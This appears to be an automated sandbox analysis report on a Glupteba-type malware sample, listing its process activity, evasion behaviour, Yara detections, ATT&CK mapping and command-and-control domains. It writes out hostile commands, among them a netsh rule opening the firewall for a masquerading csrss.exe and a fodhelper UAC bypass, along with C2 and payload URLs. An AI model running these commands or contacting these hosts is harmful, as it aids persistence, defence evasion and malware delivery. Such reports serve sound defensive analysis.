.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exe1dyvcthqv1.exevmsrvc.exevmusrvc.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exeC:\WindowsPATHEXTNUL
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: +x@Y}main.isRunningInsideVMWare
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: svchost.exesvchost.execonhost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exevmx86

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Performs DNS TXT record lookups

Show sources

Source: Traffic	DNS traffic detected: queries for: trumops.com
Source: Traffic	DNS traffic detected: queries for: logs.trumops.com
Source: Traffic	DNS traffic detected: queries for: 3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com
Source: Traffic	DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /301-301	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000006.00000002.550805662.000001F80A190000.00000002.00020000.sdmp, csrss.exe, 00000011.00000002.554582565.0000000003A60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Modifies the windows firewall

Show sources

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000B.00000002.549969533.0000024F52840000.00000004.00000001.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.550148875.0000024F52902000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

Yara detected Metasploit Payload

Show sources

Source: Yara match	File source: 33.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1dyvctHqv1.exe.51a0e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1dyvctHqv1.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.csrss.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1dyvctHqv1.exe.51a0e50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1dyvctHqv1.exe.4fe0e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1dyvctHqv1.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.1dyvctHqv1.exe.5a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1dyvctHqv1.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.csrss.exe.5700e50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1dyvctHqv1.exe.5890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.csrss.exe.5700e50.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.csrss.exe.5700e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.csrss.exe.5700e50.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.csrss.exe.5700e50.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1dyvctHqv1.exe.4fe0e50.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.csrss.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.1dyvctHqv1.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.csrss.exe.5fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000032.00000003.433190112.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.363027813.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.403303463.000000000638A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.437840695.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.441852613.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.415283023.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.327502514.00000000051A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.410184897.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.423136850.0000000005700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.415953009.0000000005700000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools3	Credential API Hooking1	File and Directory Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Command and Scripting Interpreter2	Scheduled Task/Job1	Process Injection12	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery24	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scheduled Task/Job1	Registry Run Keys / Startup Folder11	Scheduled Task/Job1	Obfuscated Files or Information11	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder11	Software Packing211	NTDS	Security Software Discovery241	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol25	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading331	Cached Domain Credentials	Process Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection12	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1dyvctHqv1.exe	20%	Virustotal		Browse
1dyvctHqv1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	100%	Avira	TR/Agent.twerk
C:\Windows\windefender.exe	100%	Avira	TR/Crypt.XPACK.eocey
C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	100%	Avira	TR/Redcap.gsjan
C:\Windows\rss\csrss.exe	100%	Joe Sandbox ML
B:\EFI\Boot\old.efi (copy)	0%	ReversingLabs
B:\EFI\Microsoft\Boot\fw.efi (copy)	0%	ReversingLabs
C:\EFI\Boot\EfiGuardDxe.efi	0%	ReversingLabs
C:\EFI\Boot\bootx64.efi	0%	ReversingLabs
C:\EFI\Microsoft\Boot\bootmgfw.efi	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	46%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	59%	ReversingLabs	Win64.Trojan.Glupject
C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	14%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	73%	ReversingLabs	Win64.Trojan.Glupteba
C:\Windows\rss\csrss.exe	25%	ReversingLabs
C:\Windows\windefender.exe	29%	Metadefender		Browse
C:\Windows\windefender.exe	79%	ReversingLabs	Win32.Trojan.WinGoRanumBot

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
17.2.csrss.exe.16c3a000.17.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File
17.2.csrss.exe.16bba000.16.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://retoti.comidentifier	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:	0%	URL Reputation	safe
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic	0%	Avira URL Cloud	safe
https://server3.trumops.comc=e3acbc4a527610e5&uuid=server3.trumops.com:443server3.trumops.com:443tcp	0%	Avira URL Cloud	safe
http://gohnot.com/546468561c5f48a95f3eb178d8283c2ec	0%	Avira URL Cloud	safe
http://help.ya	0%	Avira URL Cloud	safe
https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS	0%	Avira URL Cloud	safe
http://gohnot.com/546468561c5f48a95f3eb178d8283c2e	0%	Avira URL Cloud	safe
http://www.exabot.com/go/robot)Opera/9.80	0%	URL Reputation	safe
https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.com	0%	Avira URL Cloud	safe
https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comT	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.com	0%	Avira URL Cloud	safe
https://server3.trumops.com/api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f	0%	Avira URL Cloud	safe
https://trumops.com/api/install-failureinvalid	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://https://_bad_pdb_file.pdb	0%	Avira URL Cloud	safe
http://www.bloglines.com)F	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://newscommer.com/app/app.exe	100%	URL Reputation	malware
https://server3.trumops.com/api/poll	0%	Avira URL Cloud	safe
https://blockchain.infoindex	0%	URL Reputation	safe
https://server3.trumops.com/bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f	0%	Avira URL Cloud	safe
http://www.avantbrowser.com)MOT-V9mm/00.62	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002	0%	Avira URL Cloud	safe
http://gais.cs.ccu.edu.tw/robot.php)Gulper	0%	Avira URL Cloud	safe
http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exeH	0%	Avira URL Cloud	safe
http://www.spidersoft.com)Wget/1.9	0%	Avira URL Cloud	safe
https://retoti.com	0%	Avira URL Cloud	safe
https://trumops.comif-unmodified-sinceillegal	0%	Avira URL Cloud	safe
http://devlog.gregarius.net/docs/ua)Links	0%	URL Reputation	safe
https://server3.trumops.com	0%	Avira URL Cloud	safe
https://runmodes.com/api/log	100%	Avira URL Cloud	malware
http://grub.org)Mozilla/5.0	0%	Avira URL Cloud	safe
http://www.everyfeed.c	0%	Avira URL Cloud	safe
http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exe	0%	Avira URL Cloud	safe
https://trumops.com	0%	Avira URL Cloud	safe
https://server3.trumops.com/api/pollserver3.trumops.com	0%	Avira URL Cloud	safe
http://www.googlebot.com/bot.html)Links	0%	URL Reputation	safe
https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com	100%	Avira URL Cloud	malware
https://server3.trumops.com/api/poll62	0%	Avira URL Cloud	safe
https://server3.trumops.com3server3.trumops.com:443server3.trumops.com:443ontcpserver3.trumops.com	0%	Avira URL Cloud	safe
https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDDelegateExecuteC:	0%	Avira URL Cloud	safe
http://misc.yahoo.com.cn/he	0%	Avira URL Cloud	safe
http://crl.g	0%	URL Reputation	safe
https://sitescore.aiValue	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
runmodes.com	172.67.207.136	true	false	high
gohnot.com	172.67.196.11	true	false	high
server3.trumops.com	172.67.139.144	true	false	high
trumops.com	unknown	unknown	false	high
3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com	unknown	unknown	false	high
logs.trumops.com	unknown	unknown	false	high
e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://server3.trumops.com/api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f	false	Avira URL Cloud: safe	unknown
https://server3.trumops.com/api/poll	false	Avira URL Cloud: safe	unknown
https://server3.trumops.com/bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f	false	Avira URL Cloud: safe	unknown
https://runmodes.com/api/log	true	Avira URL Cloud: malware	unknown
http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://retoti.comidentifier	csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://search.msn.com/msnb	csrss.exe	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	false		high
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:	csrss.exe	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	false		high
https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556	1dyvctHqv1.exe, 0000000C.00000002.332244873.0000000016058000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412239285.00000000168D0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421820882.0000000016858000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.421014108.0000000016814000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	false		high
http://www.google.com/bot.html)tls:	csrss.exe	false		high
https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic	1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://server3.trumops.comc=e3acbc4a527610e5&uuid=server3.trumops.com:443server3.trumops.com:443tcp	csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://gohnot.com/546468561c5f48a95f3eb178d8283c2ec	csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://help.ya	csrss.exe	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmp	false		high
https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS	1dyvctHqv1.exe, 00000000.00000002.302703514.00000000160BA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmp	false		high
http://gohnot.com/546468561c5f48a95f3eb178d8283c2e	csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.381033593.000000001694A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://builtwith.com/biup)	csrss.exe	false		high
